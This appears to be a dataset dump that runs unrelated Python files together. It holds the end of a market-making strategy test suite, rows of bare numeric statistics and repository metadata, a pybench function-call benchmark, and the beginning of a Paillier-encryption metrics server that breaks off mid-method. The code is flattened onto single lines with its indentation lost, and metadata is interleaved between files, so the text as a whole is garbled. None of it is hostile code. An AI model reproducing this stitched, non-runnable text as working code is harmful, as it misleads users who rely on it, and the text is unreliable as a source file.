LimitOrder = strategy.active_bids[0][1] ask_order: LimitOrder = strategy.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) self.maker_order_fill_logger.clear() def test_hanging_orders_multiple_orders_mode(self): strategy = self.multi_orders_hanging_strategy self.clock.add_iterator(strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(5, len(strategy.active_bids)) self.assertEqual(5, len(strategy.active_asks)) ask_order: LimitOrder = strategy.active_asks[0][1] PureMarketMakingV2UnitTest.simulate_limit_order_fill(self.maker_market, ask_order) # Ask is filled and due to delay is not replenished immediately # Bid orders are now hanging and active self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) self.assertEqual(5, len(strategy.active_bids)) self.assertEqual(4, len(strategy.active_asks)) self.assertEqual(5, len(strategy.hanging_order_ids)) # At order_refresh_time (4 seconds), hanging order remains, asks all got canceled self.clock.backtest_til(self.start_timestamp + 5 * self.clock_tick_size) self.assertEqual(5, len(strategy.active_bids)) self.assertEqual(0, len(strategy.active_asks)) # At filled_order_delay (8 seconds), new sets of bid and ask orders are created self.clock.backtest_til(self.start_timestamp + 10 * self.clock_tick_size) self.assertEqual(10, len(strategy.active_bids)) self.assertEqual(5, len(strategy.active_asks)) # Check all hanging order ids are indeed in active bids list self.assertTrue(all(h in [order.client_order_id for market, order in strategy.active_bids] for h in strategy.hanging_order_ids)) PureMarketMakingV2UnitTest.simulate_order_book_widening(self.maker_data.order_book, 100, 120) # As order book asks moving higher, some hanging ask orders price spreads are now more than # the hanging_orders_cancel_pct self.clock.backtest_til(self.start_timestamp + 11 * self.clock_tick_size) self.assertEqual(6, len(strategy.active_bids)) self.assertEqual(5, len(strategy.active_asks)) # Prices are not adjusted according to filled price as per settings bid_order: LimitOrder = strategy.active_bids[0][1] ask_order: LimitOrder = strategy.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) self.maker_order_fill_logger.clear() def test_replenish_delay_strategy(self): strategy = self.replenish_delay_strategy self.clock.add_iterator(strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(1, len(strategy.active_bids)) self.assertEqual(1, len(strategy.active_asks)) ask_order: LimitOrder = strategy.active_asks[0][1] # At 2nd second, simulate ask order filled PureMarketMakingV2UnitTest.simulate_limit_order_fill(self.maker_market, ask_order) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size) # At cancel_wait_time, both bid and ask are canceled and not replenished immediately self.clock.backtest_til(self.start_timestamp + 5 * self.clock_tick_size) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) self.assertEqual(0, len(strategy.active_bids)) self.assertEqual(0, len(strategy.active_asks)) # New orders are placed after filled_order_delay self.clock.backtest_til(self.start_timestamp + 10 * self.clock_tick_size) self.assertEqual(1, len(strategy.active_bids)) self.assertEqual(1, len(strategy.active_asks)) # Prices are not adjusted according to filled price as per settings bid_order: LimitOrder = strategy.active_bids[0][1] ask_order: LimitOrder = strategy.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) self.maker_order_fill_logger.clear() def test_replenish_delay_multiple_orders_mode(self): strategy = self.replenish_delay_multiple_strategy self.clock.add_iterator(strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(5, len(strategy.active_bids)) self.assertEqual(5, len(strategy.active_asks)) bid_order: LimitOrder = strategy.active_bids[0][1] # At 2nd second, simulate bid order filled PureMarketMakingV2UnitTest.simulate_limit_order_fill(self.maker_market, bid_order) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size) # Bid is filled and due to delay is not replenished immediately, all outstandings got canceled self.clock.backtest_til(self.start_timestamp + 5 * self.clock_tick_size) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) self.assertEqual(0, len(strategy.active_bids)) self.assertEqual(0, len(strategy.active_asks)) # New orders are placed after filled_order_delay self.clock.backtest_til(self.start_timestamp + 10 * self.clock_tick_size) self.assertEqual(5, len(strategy.active_bids)) self.assertEqual(5, len(strategy.active_asks)) self.maker_order_fill_logger.clear() class PureMarketMakingV2InventorySkewUnitTest(unittest.TestCase): start: pd.Timestamp = pd.Timestamp("2019-01-01", tz="UTC") end: pd.Timestamp = pd.Timestamp("2019-01-01 01:00:00", tz="UTC") start_timestamp: float = start.timestamp() end_timestamp: float = end.timestamp() maker_trading_pairs: List[str] = ["COINALPHA-WETH", "COINALPHA", "WETH"] def setUp(self): self.clock_tick_size = 1 self.clock: Clock = Clock(ClockMode.BACKTEST, self.clock_tick_size, self.start_timestamp, self.end_timestamp) self.maker_market: BacktestMarket = BacktestMarket() self.maker_data: MockOrderBookLoader = MockOrderBookLoader(*self.maker_trading_pairs) self.mid_price = 100 self.bid_threshold = 0.01 self.ask_threshold = 0.01 self.order_refresh_time = 30 self.maker_data.set_balanced_order_book(mid_price=self.mid_price, min_price=1, max_price=200, price_step_size=1, volume_step_size=10) self.filter_delegate = PassThroughFilterDelegate() self.constant_pricing_delegate = ConstantSpreadPricingDelegate(Decimal(self.bid_threshold), Decimal(self.ask_threshold)) self.multiple_order_strategy_pricing_delegate = ConstantMultipleSpreadPricingDelegate( bid_spread=Decimal(self.bid_threshold), ask_spread=Decimal(self.ask_threshold), order_level_spread=Decimal("0.01"), order_levels=5 ) self.inventory_skew_single_size_sizing_delegate = InventorySkewSingleSizeSizingDelegate( order_size=Decimal("1"), inventory_target_base_percent=Decimal("0.9"), inventory_range_multiplier=Decimal("5") ) self.inventory_skew_multiple_size_sizing_delegate = InventorySkewMultipleSizeSizingDelegate( order_start_size=Decimal("1.0"), order_step_size=Decimal("0.5"), order_levels=5, inventory_target_base_percent=Decimal("0.9"), inventory_range_multiplier=Decimal("0.5") ) self.maker_market.add_data(self.maker_data) self.maker_market.set_balance("COINALPHA", 500) self.maker_market.set_balance("WETH", 5000) self.maker_market.set_balance("QETH", 500) self.maker_market.set_quantization_param( QuantizationParams( self.maker_trading_pairs[0], 6, 6, 6, 6 ) ) self.market_info: MarketTradingPairTuple = MarketTradingPairTuple( *( [self.maker_market] + self.maker_trading_pairs ) ) logging_options: int = (PureMarketMakingStrategyV2.OPTION_LOG_ALL & (~PureMarketMakingStrategyV2.OPTION_LOG_NULL_ORDER_SIZE)) self.inventory_skew_single_order_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, sizing_delegate=self.inventory_skew_single_size_sizing_delegate, pricing_delegate=self.constant_pricing_delegate, order_refresh_time=45, filled_order_delay=0, logging_options=logging_options ) self.inventory_skew_single_order_strategy_delayed_fill: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, sizing_delegate=self.inventory_skew_single_size_sizing_delegate, pricing_delegate=self.constant_pricing_delegate, order_refresh_time=45, filled_order_delay=15, logging_options=logging_options ) self.inventory_skew_multiple_order_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, sizing_delegate=self.inventory_skew_multiple_size_sizing_delegate, pricing_delegate=self.multiple_order_strategy_pricing_delegate, order_refresh_time=45, logging_options=logging_options ) self.logging_options = logging_options self.clock.add_iterator(self.maker_market) self.maker_order_fill_logger: EventLogger = EventLogger() self.cancel_order_logger: EventLogger = EventLogger() self.maker_market.add_listener(MarketEvent.OrderFilled, self.maker_order_fill_logger) self.maker_market.add_listener(MarketEvent.OrderCancelled, self.cancel_order_logger) def simulate_maker_market_trade(self, is_buy: bool, quantity: float): maker_trading_pair: str = self.maker_trading_pairs[0] order_book: OrderBook = self.maker_market.get_order_book(maker_trading_pair) trade_event: OrderBookTradeEvent = OrderBookTradeEvent( maker_trading_pair, self.clock.current_timestamp, TradeType.BUY if is_buy else TradeType.SELL, (self.mid_price * (1 - self.bid_threshold - 0.01) if not is_buy else self.mid_price * (1 + self.ask_threshold + 0.01)), quantity ) order_book.apply_trade(trade_event) def test_inventory_skew_single_order_strategy(self): self.clock.add_iterator(self.inventory_skew_single_order_strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(1, len(self.inventory_skew_single_order_strategy.active_bids)) self.assertEqual(1, len(self.inventory_skew_single_order_strategy.active_asks)) first_bid_order: LimitOrder = self.inventory_skew_single_order_strategy.active_bids[0][1] first_ask_order: LimitOrder = self.inventory_skew_single_order_strategy.active_asks[0][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), first_ask_order.price) self.assertEqual(Decimal("0.5"), first_bid_order.quantity) self.assertEqual(Decimal("1.5"), first_ask_order.quantity) self.simulate_maker_market_trade(True, 5.0) self.assertEqual(1, len(self.inventory_skew_single_order_strategy.active_bids)) self.assertEqual(0, len(self.inventory_skew_single_order_strategy.active_asks)) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) maker_fill: OrderFilledEvent = self.maker_order_fill_logger.event_log[0] self.assertEqual(TradeType.SELL, maker_fill.trade_type) self.assertAlmostEqual(101, maker_fill.price) self.assertAlmostEqual(Decimal("1.5"), Decimal(str(maker_fill.amount)), places=4) self.clock.backtest_til(self.start_timestamp + 3 * self.clock_tick_size + 1) self.assertEqual(1, len(self.inventory_skew_single_order_strategy.active_bids)) self.assertEqual(1, len(self.inventory_skew_single_order_strategy.active_asks)) first_bid_order: LimitOrder = self.inventory_skew_single_order_strategy.active_bids[0][1] first_ask_order: LimitOrder = self.inventory_skew_single_order_strategy.active_asks[0][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), first_ask_order.price) self.assertEqual(Decimal("0.651349"), first_bid_order.quantity) self.assertEqual(Decimal("1.34865"), first_ask_order.quantity) def test_inventory_skew_single_order_strategy_delayed_fill(self): self.clock.add_iterator(self.inventory_skew_single_order_strategy_delayed_fill) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size + 1) self.assertEqual(1, len(self.inventory_skew_single_order_strategy_delayed_fill.active_bids)) self.assertEqual(1, len(self.inventory_skew_single_order_strategy_delayed_fill.active_asks)) first_bid_order: LimitOrder = self.inventory_skew_single_order_strategy_delayed_fill.active_bids[0][1] first_ask_order: LimitOrder = self.inventory_skew_single_order_strategy_delayed_fill.active_asks[0][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), first_ask_order.price) self.assertEqual(Decimal("0.5"), first_bid_order.quantity) self.assertEqual(Decimal("1.5"), first_ask_order.quantity) self.simulate_maker_market_trade(True, 5.0) self.assertEqual(1, len(self.inventory_skew_single_order_strategy_delayed_fill.active_bids)) self.assertEqual(0, len(self.inventory_skew_single_order_strategy_delayed_fill.active_asks)) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) maker_fill: OrderFilledEvent = self.maker_order_fill_logger.event_log[0] self.assertEqual(TradeType.SELL, maker_fill.trade_type) self.assertAlmostEqual(101, maker_fill.price) self.assertAlmostEqual(Decimal("1.5"), Decimal(str(maker_fill.amount)), places=4) self.clock.backtest_til(self.start_timestamp + 3 * self.clock_tick_size + 1) # Order is not replenished till replenish time self.assertEqual(1, len(self.inventory_skew_single_order_strategy_delayed_fill.active_bids)) self.assertEqual(0, len(self.inventory_skew_single_order_strategy_delayed_fill.active_asks)) first_bid_order: LimitOrder = self.inventory_skew_single_order_strategy_delayed_fill.active_bids[0][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("0.5"), first_bid_order.quantity) self.clock.backtest_til(self.start_timestamp + 60 * self.clock_tick_size + 1) self.assertEqual(1, len(self.inventory_skew_single_order_strategy_delayed_fill.active_bids)) self.assertEqual(1, len(self.inventory_skew_single_order_strategy_delayed_fill.active_asks)) first_bid_order: LimitOrder = self.inventory_skew_single_order_strategy_delayed_fill.active_bids[0][1] first_ask_order: LimitOrder = self.inventory_skew_single_order_strategy_delayed_fill.active_asks[0][1] # Price does not change based on filled price self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), first_ask_order.price) self.assertEqual(Decimal("0.651349"), first_bid_order.quantity) self.assertEqual(Decimal("1.34865"), first_ask_order.quantity) def test_inventory_skew_multiple_order_strategy(self): self.clock.add_iterator(self.inventory_skew_multiple_order_strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(5, len(self.inventory_skew_multiple_order_strategy.active_bids)) self.assertEqual(5, len(self.inventory_skew_multiple_order_strategy.active_asks)) first_bid_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_bids[0][1] first_ask_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_asks[0][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), first_ask_order.price) self.assertEqual(Decimal("0.5"), first_bid_order.quantity) self.assertEqual(Decimal("1.5"), first_ask_order.quantity) last_bid_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_bids[-1][1] last_ask_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_asks[-1][1] last_bid_price = Decimal(99 * (1 - 0.01) ** 4).quantize(Decimal("0.001")) last_ask_price = Decimal(101 * (1 + 0.01) ** 4).quantize(Decimal("0.001")) self.assertAlmostEqual(last_bid_price, last_bid_order.price, 3) self.assertAlmostEqual(last_ask_price, last_ask_order.price, 3) self.assertEqual(Decimal("1.5"), last_bid_order.quantity) self.assertEqual(Decimal("4.5"), last_ask_order.quantity) self.simulate_maker_market_trade(True, 5.0) self.assertEqual(5, len(self.inventory_skew_multiple_order_strategy.active_bids)) self.assertEqual(4, len(self.inventory_skew_multiple_order_strategy.active_asks)) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) maker_fill: OrderFilledEvent = self.maker_order_fill_logger.event_log[0] self.assertEqual(TradeType.SELL, maker_fill.trade_type) self.assertAlmostEqual(101, maker_fill.price) self.assertAlmostEqual(Decimal("1.5"), Decimal(str(maker_fill.amount)), places=4) # The default filled_order_delay is 60, so gotta wait 60 + 2 here. self.clock.backtest_til(self.start_timestamp + 62 * self.clock_tick_size + 1) self.assertEqual(5, len(self.inventory_skew_multiple_order_strategy.active_bids)) self.assertEqual(5, len(self.inventory_skew_multiple_order_strategy.active_asks)) first_bid_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_bids[0][1] first_ask_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_asks[0][1] last_bid_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_bids[-1][1] last_ask_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_asks[-1][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), first_ask_order.price) self.assertEqual(Decimal("0.651349"), first_bid_order.quantity) self.assertEqual(Decimal("1.34865"), first_ask_order.quantity) last_bid_price = Decimal(99 * (1 - 0.01) ** 4).quantize(Decimal("0.001")) last_ask_price = Decimal(101 * (1 + 0.01) ** 4).quantize(Decimal("0.001")) self.assertAlmostEqual(last_bid_price, last_bid_order.price, 3) self.assertAlmostEqual(last_ask_price, last_ask_order.price, 3) self.assertEqual(Decimal("1.95404"), last_bid_order.quantity) self.assertEqual(Decimal("4.04595"), last_ask_order.quantity)
52.878808
120
0.707588
9,857
78,102
5.285381
0.040885
0.086952
0.054474
0.026757
0.905294
0.886809
0.87274
0.850589
0.840858
0.827172
0
0.024684
0.198074
78,102
1,476
121
52.914634
0.807127
0.037259
0
0.721193
0
0
0.014319
0
0
0
0
0
0.270749
1
0.036261
false
0.004835
0.019339
0.002417
0.074134
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
82e7a9137be31e07c008d347548e79e64b7d0c91
7,076
py
Python
pypy/translator/microbench/pybench/Calls.py
camillobruni/pygirl
ddbd442d53061d6ff4af831c1eab153bcc771b5a
[ "MIT" ]
12
2016-01-06T07:10:28.000Z
2021-05-13T23:02:02.000Z
pypy/translator/microbench/pybench/Calls.py
woodrow/pyoac
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
[ "MIT" ]
null
null
null
pypy/translator/microbench/pybench/Calls.py
woodrow/pyoac
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
[ "MIT" ]
2
2016-07-29T07:09:50.000Z
2016-10-16T08:50:26.000Z
from pybench import Test class PythonFunctionCalls(Test): version = 0.3 operations = 5*(1+4+4+2) rounds = 60000 def test(self): global f,f1,g,h # define functions def f(): pass def f1(x): pass def g(a,b,c): return a,b,c def h(a,b,c,d=1,e=2,f=3): return d,e,f # do calls for i in xrange(self.rounds): f() f1(i) f1(i) f1(i) f1(i) g(i,i,i) g(i,i,i) g(i,i,i) g(i,i,i) h(i,i,3,i,i) h(i,i,i,2,i,3) f() f1(i) f1(i) f1(i) f1(i) g(i,i,i) g(i,i,i) g(i,i,i) g(i,i,i) h(i,i,3,i,i) h(i,i,i,2,i,3) f() f1(i) f1(i) f1(i) f1(i) g(i,i,i) g(i,i,i) g(i,i,i) g(i,i,i) h(i,i,3,i,i) h(i,i,i,2,i,3) f() f1(i) f1(i) f1(i) f1(i) g(i,i,i) g(i,i,i) g(i,i,i) g(i,i,i) h(i,i,3,i,i) h(i,i,i,2,i,3) f() f1(i) f1(i) f1(i) f1(i) g(i,i,i) g(i,i,i) g(i,i,i) g(i,i,i) h(i,i,3,i,i) h(i,i,i,2,i,3) def calibrate(self): global f,f1,g,h # define functions def f(): pass def f1(x): pass def g(a,b,c): return a,b,c def h(a,b,c,d=1,e=2,f=3): return d,e,f # do calls for i in xrange(self.rounds): pass ### class BuiltinFunctionCalls(Test): version = 0.4 operations = 5*(2+5+5+5) rounds = 30000 def test(self): # localize functions f0 = globals f1 = hash f2 = cmp f3 = range # do calls for i in xrange(self.rounds): f0() f0() f1(i) f1(i) f1(i) f1(i) f1(i) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f0() f0() f1(i) f1(i) f1(i) f1(i) f1(i) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f0() f0() f1(i) f1(i) f1(i) f1(i) f1(i) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f0() f0() f1(i) f1(i) f1(i) f1(i) f1(i) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f0() f0() f1(i) f1(i) f1(i) f1(i) f1(i) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) def calibrate(self): # localize functions f0 = dir f1 = hash f2 = range f3 = range # do calls for i in xrange(self.rounds): pass ### class PythonMethodCalls(Test): version = 0.3 operations = 5*(6 + 5 + 4) rounds = 20000 def test(self): class c: x = 2 s = 'string' def f(self): return self.x def j(self,a,b): self.y = a self.t = b return self.y def k(self,a,b,c=3): self.y = a self.s = b self.t = c o = c() for i in xrange(self.rounds): o.f() o.f() o.f() o.f() o.f() o.f() o.j(i,i) o.j(i,i) o.j(i,2) o.j(i,2) o.j(2,2) o.k(i,i) o.k(i,2) o.k(i,2,3) o.k(i,i,c=4) o.f() o.f() o.f() o.f() o.f() o.f() o.j(i,i) o.j(i,i) o.j(i,2) o.j(i,2) o.j(2,2) o.k(i,i) o.k(i,2) o.k(i,2,3) o.k(i,i,c=4) o.f() o.f() o.f() o.f() o.f() o.f() o.j(i,i) o.j(i,i) o.j(i,2) o.j(i,2) o.j(2,2) o.k(i,i) o.k(i,2) o.k(i,2,3) o.k(i,i,c=4) o.f() o.f() o.f() o.f() o.f() o.f() o.j(i,i) o.j(i,i) o.j(i,2) o.j(i,2) o.j(2,2) o.k(i,i) o.k(i,2) o.k(i,2,3) o.k(i,i,c=4) o.f() o.f() o.f() o.f() o.f() o.f() o.j(i,i) o.j(i,i) o.j(i,2) o.j(i,2) o.j(2,2) o.k(i,i) o.k(i,2) o.k(i,2,3) o.k(i,i,c=4) def calibrate(self): class c: x = 2 s = 'string' def f(self): return self.x def j(self,a,b): self.y = a self.t = b def k(self,a,b,c=3): self.y = a self.s = b self.t = c o = c for i in xrange(self.rounds): pass ### class Recursion(Test): version = 0.3 operations = 5 rounds = 50000 def test(self): global f def f(x): if x > 1: return f(x-1) return 1 for i in xrange(self.rounds): f(10) f(10) f(10) f(10) f(10) def calibrate(self): global f def f(x): if x > 0: return f(x-1) return 1 for i in xrange(self.rounds): pass
17.216545
37
0.266535
1,038
7,076
1.816956
0.06262
0.084836
0.092789
0.111347
0.840403
0.820255
0.782078
0.779958
0.747084
0.747084
0
0.126731
0.59186
7,076
410
38
17.258537
0.526316
0.015122
0
0.928125
0
0
0.001727
0
0
0
0
0
0
1
0.075
false
0.025
0.003125
0.01875
0.16875
0
0
0
1
null
0
0
0
1
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
7d9fb42eb122b1b65c817f8cc8ed752e5fffdcdb
32,327
py
Python
python/paddle_fl/feature_engineering/core/metrics_server.py
HyphenSun/PaddleFL
08bfddb9160f9595b9ad9fb8563e16e39860e1ac
[ "Apache-2.0" ]
null
null
null
python/paddle_fl/feature_engineering/core/metrics_server.py
HyphenSun/PaddleFL
08bfddb9160f9595b9ad9fb8563e16e39860e1ac
[ "Apache-2.0" ]
null
null
null
python/paddle_fl/feature_engineering/core/metrics_server.py
HyphenSun/PaddleFL
08bfddb9160f9595b9ad9fb8563e16e39860e1ac
[ "Apache-2.0" ]
null
null
null
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License """ metrics servicer implementation server-side(bob) """ from concurrent import futures import logging import random import numpy as np import pandas as pd import grpc import he_utils as hu from ..proto import metrics_pb2 from ..proto import metrics_pb2_grpc logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s') logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) class MpcPositiveRatioServicer(metrics_pb2_grpc.MpcPositiveRatioServicer): """ Positive ratio servicer implementation """ def __init__(self, features, stop_event): """ load feature to server prams: features: a feature list in the shape of (sample_size, features_size) e.g. [[4, 3, 1], [1, 2, 5],...,[2, 3 ,2]] (feature_size = 3) stop_event: control the server shutdown when the server does not participate in the protocol """ self._sample_size = len(features) self._features = features self._feature_size = len(features[0]) self._stop_event = stop_event logger.info('feature size: {0}, sample size: {1}'.format( self._feature_size, self._sample_size)) def SyncSampleSize(self, request, context): """ client sync sample size and feature size with server """ logger.info('received client\'s sample size: {}'.format(request.sample_size)) if request.sample_size == self._sample_size: return metrics_pb2.Sample(sample_size = self._sample_size, feature_size = self._feature_size) else: return metrics_pb2.Sample(sample_size = -1, feature_size = 0) def SendPubkey(self, request, context): """ client send pubkey to server """ paillier = hu.Paillier() paillier.import_pk(request.pk) self._paillier = paillier logger.info('received pub key') return metrics_pb2.Status(code = 1) def GetLabelsSum(self, request, context): """ client get labels sum from server """ batch_size = request.sample_size if (self._sample_size != batch_size): raise ValueError("sample size not equal") logger.info('decoding labels') self._enc_labels = self._paillier.batch_decode(request.labels) all_pos_sum = [] all_neg_sum = [] logger.info('calculating labels sum:') for feature_idx in range(self._feature_size): logger.info('processing feature idx {}'.format(feature_idx)) pos_sum = {} neg_sum = {} feature_bin = {} for sample_index in range(self._sample_size): feature_value = self._features[sample_index][feature_idx] if(feature_value in feature_bin): pos_sum[feature_value] = self._paillier.homm_add(pos_sum[feature_value], self._enc_labels[sample_index]) feature_bin[feature_value] += 1 else: pos_sum[feature_value] = self._enc_labels[sample_index] feature_bin[feature_value] = 1 # cal neg sum for key, value in pos_sum.items(): bin_size_cipher = self._paillier.encrypt_int64_t(feature_bin[key]) neg_sum[key] = self._paillier.homm_minus(bin_size_cipher, value) #Blind using random numbers N/8 bits for key in pos_sum.keys(): blind_r = self._paillier.get_random_bits(self._paillier.byte_len(0)) pos_sum[key] = self._paillier.homm_mult(pos_sum[key], blind_r) pos_sum[key] = self._paillier.encode_cipher_bytes(pos_sum[key]) neg_sum[key] = self._paillier.homm_mult(neg_sum[key], blind_r) neg_sum[key] = self._paillier.encode_cipher_bytes(neg_sum[key]) all_pos_sum.append(pos_sum) all_neg_sum.append(neg_sum) feature_labels_sum = metrics_pb2.FeatureLabelsSum(feature_size = self._feature_size, labels = []) for feature_idx in range(self._feature_size): bin_labels_sum = metrics_pb2.BinLabelsSum(bins_size = len(all_pos_sum[feature_idx]), positive_sum = all_pos_sum[feature_idx], negative_sum = all_neg_sum[feature_idx]) feature_labels_sum.labels.append(bin_labels_sum) self._stop_event.set() logger.info('sending labels sum') return feature_labels_sum class MpcWOEServicer(metrics_pb2_grpc.MpcWOEServicer): """ woe servicer implementation """ def __init__(self, features, stop_event, woe_list): """ load feature to server prams: features: a feature list in the shape of (sample_size, features_size) e.g. [[4, 3, 1], [1, 2, 5],...,[2, 3 ,2]] (feature_size = 3) stop_event: control the server shutdown when the server does not participate in the protocol woe_list: server store the result in woe_list """ self._sample_size = len(features) self._features = features self._feature_size = len(features[0]) self._stop_event = stop_event self._woe_list = woe_list logger.info('feature size: {0}, sample size: {1}'.format( self._feature_size, self._sample_size)) def SyncSampleSize(self, request, context): """ client sync sample size and feature size with server """ logger.info('received client\'s sample size: {}'.format(request.sample_size)) if request.sample_size == self._sample_size: return metrics_pb2.Sample(sample_size = self._sample_size, feature_size = self._feature_size) else: return metrics_pb2.Sample(sample_size = -1, feature_size = 0) def SendPubkey(self, request, context): """ client send pubkey to server """ paillier = hu.Paillier() paillier.import_pk(request.pk) self._paillier = paillier logger.info('received pub key') return metrics_pb2.Status(code = 1) def GetLabelsSum(self, request, context): """ client get labels sum from server """ batch_size = request.sample_size if (self._sample_size != batch_size): raise ValueError("sample size not equal") logger.info('decoding labels') self._enc_labels = self._paillier.batch_decode(request.labels) all_pos_sum = [] all_neg_sum = [] logger.info('calculating labels sum:') for feature_idx in range(self._feature_size): logger.info('processing feature idx {}'.format(feature_idx)) pos_sum = {} neg_sum = {} feature_bin = {} for sample_index in range(self._sample_size): feature_value = self._features[sample_index][feature_idx] if(feature_value in feature_bin): pos_sum[feature_value] = self._paillier.homm_add(pos_sum[feature_value], self._enc_labels[sample_index]) feature_bin[feature_value] += 1 else: pos_sum[feature_value] = self._enc_labels[sample_index] feature_bin[feature_value] = 1 # cal neg sum for key, value in pos_sum.items(): bin_size_cipher = self._paillier.encrypt_int64_t(feature_bin[key]) neg_sum[key] = self._paillier.homm_minus(bin_size_cipher, value) #Blind using random numbers N/8 bits for key in pos_sum.keys(): blind_r = self._paillier.get_random_bits(self._paillier.byte_len(0)) pos_sum[key] = self._paillier.homm_mult(pos_sum[key], blind_r) pos_sum[key] = self._paillier.encode_cipher_bytes(pos_sum[key]) neg_sum[key] = self._paillier.homm_mult(neg_sum[key], blind_r) neg_sum[key] = self._paillier.encode_cipher_bytes(neg_sum[key]) all_pos_sum.append(pos_sum) all_neg_sum.append(neg_sum) feature_labels_sum = metrics_pb2.FeatureLabelsSum(feature_size = self._feature_size, labels = []) for feature_idx in range(self._feature_size): bin_labels_sum = metrics_pb2.BinLabelsSum(bins_size = len(all_pos_sum[feature_idx]), positive_sum = all_pos_sum[feature_idx], negative_sum = all_neg_sum[feature_idx]) feature_labels_sum.labels.append(bin_labels_sum) logger.info('sending labels sum') return feature_labels_sum def SendWOE(self, request, context): """ client send woe to server """ for feature_idx in range(request.feature_size): woe_dict = request.values[feature_idx].value_dict woe_dict_ = {} for key in woe_dict.keys(): woe_dict_[key] = round(woe_dict[key], 6) self._woe_list.append(woe_dict_) logger.info('received woe') self._stop_event.set() return metrics_pb2.Status(code = 1) class MpcIVServicer(metrics_pb2_grpc.MpcIVServicer): """ iv servicer implementation """ def __init__(self, features, stop_event, iv_list, woe_list=[]): """ load feature to server prams: features: a feature list in the shape of (sample_size, features_size) e.g. [[4, 3, 1], [1, 2, 5],...,[2, 3 ,2]] (feature_size = 3) stop_event: control the server shutdown when the server does not participate in the protocol iv_list: server store the result in iv_list woe_list: server store the woe in woe_list """ self._sample_size = len(features) self._features = features self._feature_size = len(features[0]) self._stop_event = stop_event self._iv_list = iv_list self._woe_list = woe_list logger.info('feature size: {0}, sample size: {1}'.format( self._feature_size, self._sample_size)) def SyncSampleSize(self, request, context): """ client sync sample size and feature size with server """ logger.info('received client\'s sample size: {}'.format(request.sample_size)) if request.sample_size == 